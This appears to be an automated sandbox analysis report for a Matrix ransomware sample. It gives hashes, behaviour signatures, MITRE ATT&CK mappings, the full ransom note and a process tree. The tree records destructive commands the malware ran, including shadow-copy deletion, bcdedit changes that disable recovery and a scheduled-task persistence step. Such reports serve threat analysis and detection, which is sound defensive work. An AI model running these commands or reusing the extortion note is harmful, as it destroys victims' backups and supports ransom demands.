Overview

overview

10

Static

static

3

FoxRansomw...65.exe

windows7-x64

10

FoxRansomw...65.exe

windows10-2004-x64

10

FoxRansomw...a7.exe

windows7-x64

10

FoxRansomw...a7.exe

windows10-2004-x64

10

FoxRansomw...20.exe

windows7-x64

10

FoxRansomw...20.exe

windows10-2004-x64

10

FoxRansomw...0b.exe

windows7-x64

10

FoxRansomw...0b.exe

windows10-2004-x64

10

FoxRansomw...53.exe

windows7-x64

10

FoxRansomw...53.exe

windows10-2004-x64

10

FoxRansomw...b1.exe

windows7-x64

10

FoxRansomw...b1.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-04-2024 17:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe

  • Size

    1.2MB

  • MD5

    607d292bdcdde297252e002e613282ae

  • SHA1

    0161d2dd582d064f7e7f50ccb43478ff0884916a

  • SHA256

    0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65

  • SHA512

    2bdc2ff857f9f52aac5071d3a695f7baf822a971969ba263ad03769c41af7916b558bada6bfe76fe78f730235a4ca5d2dd1cf3eaa2a59c5efef06af0a798acb8

  • SSDEEP

    24576:J/SA+2lraRrjSJR5ezmT1dM9bB5slYQt2e8F/KpXcd:PXlOslYQt+5

Score
10/10
matrixdiscoveryevasionpersistenceransomwarespywarestealerupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files\dotnet\host\fxr\8.0.0\#ANN_README#.rtf

Ransom Note
{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 2545CEF051F62552\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cUPmiEDYswzWC3ZmbtybDJeUNHqSpERL1\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 2545CEF051F62552\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 YJjpv3Iw\cf0\f1\fs32\lang1049\par \par }
Emails
URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

    ransomwarematrix
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops desktop.ini file(s) 27 IoCs
  • Enumerates connected drives 3 TTPs 44 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe"
    1⤵
    • Matrix Ransomware
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:3216
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWN3tkpU.exe"
      2⤵
        PID:1048
      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWN3tkpU.exe
        "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWN3tkpU.exe" -n
        2⤵
        • Executes dropped EXE
        PID:2580
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\SSuD4uaW.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4404
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:736
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\m4Ny8X8V.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1104
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\m4Ny8X8V.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:1728
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:4744
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
              PID:1820
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\ienR2NRx.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4352
            • C:\Windows\SysWOW64\wscript.exe
              wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\ienR2NRx.vbs"
              3⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:3784
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\uoUSUD5r.bat" /sc minute /mo 5 /RL HIGHEST /F
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:5912
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\uoUSUD5r.bat" /sc minute /mo 5 /RL HIGHEST /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:2172
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:6064
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Run /I /tn DSHCA
                  5⤵
                    PID:5596
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xDTSb5xm.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:908
              • C:\Windows\SysWOW64\attrib.exe
                attrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
                3⤵
                • Views/modifies file attributes
                PID:2192
              • C:\Windows\SysWOW64\cacls.exe
                cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
                3⤵
                  PID:4436
                • C:\Windows\SysWOW64\takeown.exe
                  takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
                  3⤵
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1096
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c dwJakgr2.exe -accepteula "store.db" -nobanner
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:540
                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\dwJakgr2.exe
                    dwJakgr2.exe -accepteula "store.db" -nobanner
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:4912
                    • C:\Users\Admin\AppData\Local\Temp\dwJakgr264.exe
                      dwJakgr2.exe -accepteula "store.db" -nobanner
                      5⤵
                      • Drops file in Drivers directory
                      • Sets service image path in registry
                      • Executes dropped EXE
                      • Enumerates connected drives
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: LoadsDriver
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1584
            • C:\Windows\SYSTEM32\cmd.exe
              C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\uoUSUD5r.bat"
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:5432
              • C:\Windows\system32\vssadmin.exe
                vssadmin Delete Shadows /All /Quiet
                2⤵
                • Interacts with shadow copies
                PID:1464
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic SHADOWCOPY DELETE
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4404
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled No
                2⤵
                • Modifies boot configuration data using bcdedit
                PID:5564
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy ignoreallfailures
                2⤵
                • Modifies boot configuration data using bcdedit
                PID:5224
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Delete /TN DSHCA /F
                2⤵
                  PID:6080
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3420

              Network

              MITRE ATT&CK Enterprise v15

              Reconnaissance

              Resource Development

              Initial Access

              Execution

              Scheduled Task/Job

              1
              T1053

              Persistence

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Scheduled Task/Job

              1
              T1053

              Privilege Escalation

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Scheduled Task/Job

              1
              T1053

              Defense Evasion

              File and Directory Permissions Modification

              1
              T1222

              Hide Artifacts

              1
              T1564

              Hidden Files and Directories

              1
              T1564.001

              Indicator Removal

              2
              T1070

              File Deletion

              2
              T1070.004

              Modify Registry

              2
              T1112

              Credential Access

              Unsecured Credentials

              1
              T1552

              Credentials In Files

              1
              T1552.001

              Discovery

              Peripheral Device Discovery

              1
              T1120

              Query Registry

              3
              T1012

              System Information Discovery

              3
              T1082

              Lateral Movement

              Collection

              Data from Local System

              1
              T1005

              Command and Control

              Exfiltration

              Impact

              Defacement

              1
              T1491

              Inhibit System Recovery

              3
              T1490

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Program Files\dotnet\host\fxr\8.0.0\#ANN_README#.rtf
                Filesize

                8KB

                MD5

                5c044fb834c5c9f072443d3fc1809062

                SHA1

                d5c9c6e322a75c9b2634d4c9359f9a8a9406db8b

                SHA256

                e55b54c869fbc3b3669b2cc3a58ffb0b4330952f95ab160b54298017d0b0ccaa

                SHA512

                c6940c695810519c4894803fae50db174f5491a737377450f41eb9ddf22894d2ef22d9d489b1de012efd4380584e85b449b561bc318af289fca5154365a3516d

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                Filesize

                3KB

                MD5

                6a93e9c3049416aa21d37db4bd2e1262

                SHA1

                10b82877b9fb15d3264a1abf34946e236d938a24

                SHA256

                4fd3bb3ce3117836476e2f329bcc862460778afe04e43b1b2317e8138fac8ca0

                SHA512

                6f61aa7f96b9ca52cae93347947999c8edc138e6cfa529afc638f1168292f9df6496d460788589683f8ba4a7ae457318aa6e5d8106efb3106ba4a430e9d659c5

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWN3tkpU.exe
                Filesize

                1.2MB

                MD5

                607d292bdcdde297252e002e613282ae

                SHA1

                0161d2dd582d064f7e7f50ccb43478ff0884916a

                SHA256

                0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65

                SHA512

                2bdc2ff857f9f52aac5071d3a695f7baf822a971969ba263ad03769c41af7916b558bada6bfe76fe78f730235a4ca5d2dd1cf3eaa2a59c5efef06af0a798acb8

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\SSuD4uaW.txt
                Filesize

                16B

                MD5

                17d432845dc7cb55ac69d75cf72f7f5d

                SHA1

                7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3

                SHA256

                a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4

                SHA512

                25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_2545CEF051F62552.txt
                Filesize

                3KB

                MD5

                b1d3bfba371350ab659dbe93370e5476

                SHA1

                abbc80b0bd408085ce5198c5525b80a603d29153

                SHA256

                cb3886c7ab0050763acd4e966c27805d54c930446e06f2bf04ae942cdca2fd1a

                SHA512

                577beba3a45bc4db665ddb6bbd5796a3acfc99320e4b827bc67ab81cfe6fb4bdfc203095cfbee630988d8ba8b84597747d3b4c43d6413a796c4afad3d000eaf6

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\dwJakgr2.exe
                Filesize

                181KB

                MD5

                2f5b509929165fc13ceab9393c3b911d

                SHA1

                b016316132a6a277c5d8a4d7f3d6e2c769984052

                SHA256

                0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                SHA512

                c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_2545CEF051F62552.txt
                Filesize

                615B

                MD5

                57704b10f354c19968d019e8ef067b6c

                SHA1

                d6dfab58dd8df9be790b60685438a5c90ceaaf4c

                SHA256

                80f43411888f4103204b2818edaa48987d7a27f659f67bfbee8f237c4540cda2

                SHA512

                e0fc46c4c134e5a446a625c72922c4808ebbee5b04cac3ce83b6487d77b340a4b0bbecbe8859e803a5934c1bc75f3cbe42bd49a095a2bfcd8e9fd04603026495

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_2545CEF051F62552.txt
                Filesize

                7KB

                MD5

                fc292b713838772f7f1e948761f0f8de

                SHA1

                50c2c14d1cf82c11427000cf59679b565e63fd36

                SHA256

                65ac4747ebf5f60d535c0f98c596bb1ea7ec69dc1f584b951984f21f5d88044c

                SHA512

                0861e88acc2a8fbb03c5f6102a03deabb61aeffcb0f17db78effde6c9b6d707bbe7ae77db1a778d1b91c95a1acb74d182e6e681348806967f9a79e030c197eef

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xDTSb5xm.bat
                Filesize

                246B

                MD5

                8a0e56320b8c730499a7936edec60a17

                SHA1

                aef71c7d38f9b8eaf34d48c79a4fd8b55f980d34

                SHA256

                b91e0e3f1676b9dbecbd6b488065ed5e988fe3075ff374674d87ab1fb4e2e3d4

                SHA512

                770fe8394825f60de669c03c13d4b30184f80ee460526d2a4fe841b0c212ac3f18f5056fc0ba16df095c54846b6a46d53378e905a11fd67f299b798fd969facf

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qqpnx4bh.t5x.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\dwJakgr264.exe
                Filesize

                221KB

                MD5

                3026bc2448763d5a9862d864b97288ff

                SHA1

                7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                SHA256

                7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                SHA512

                d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                Download Submit

              • C:\Users\Admin\AppData\Roaming\ienR2NRx.vbs
                Filesize

                260B

                MD5

                ac22a9a273f0c766508e39c1d8ead629

                SHA1

                ab6116ae3c5dfa703af330a981057a034f8092a1

                SHA256

                e080e8ba56e13a5740ff3e33bc79f3a2ceaedef6e49e3b0f2dd702d0aea53241

                SHA512

                5d1c8e501b68305614d9342cdff22bbe1c1f8d32261ec98a8332dcad8dd6011b0e4a7bd4bdeff009357434d55411245b4495f873391cb81fc2de0ecd655665fe

                Download Submit

              • C:\Users\Admin\AppData\Roaming\uoUSUD5r.bat
                Filesize

                265B

                MD5

                123f2e706fca502e2bfc760e14670afe

                SHA1

                6c293b42892132b28d821a065a934616bc0730e6

                SHA256

                5f6436ca74ab41abe600a400a3ff4176503fc930813c84115166b011d0b6086b

                SHA512

                93e21788bd0f2d9a5fe60942ba271156b6f5180602f2f6d9b9c0014fbcda2d7598d81b323b86850ef1476b47c74092187e3247e0b749054a9608906cdf76141f

                Download Submit

              • memory/736-13-0x0000000005620000-0x0000000005686000-memory.dmp

                Filesize

                408KB

                Download

              • memory/736-24-0x0000000005770000-0x0000000005AC4000-memory.dmp

                Filesize

                3.3MB

                Download

              • memory/736-29-0x0000000007390000-0x0000000007A0A000-memory.dmp

                Filesize

                6.5MB

                Download

              • memory/736-30-0x0000000006250000-0x000000000626A000-memory.dmp

                Filesize

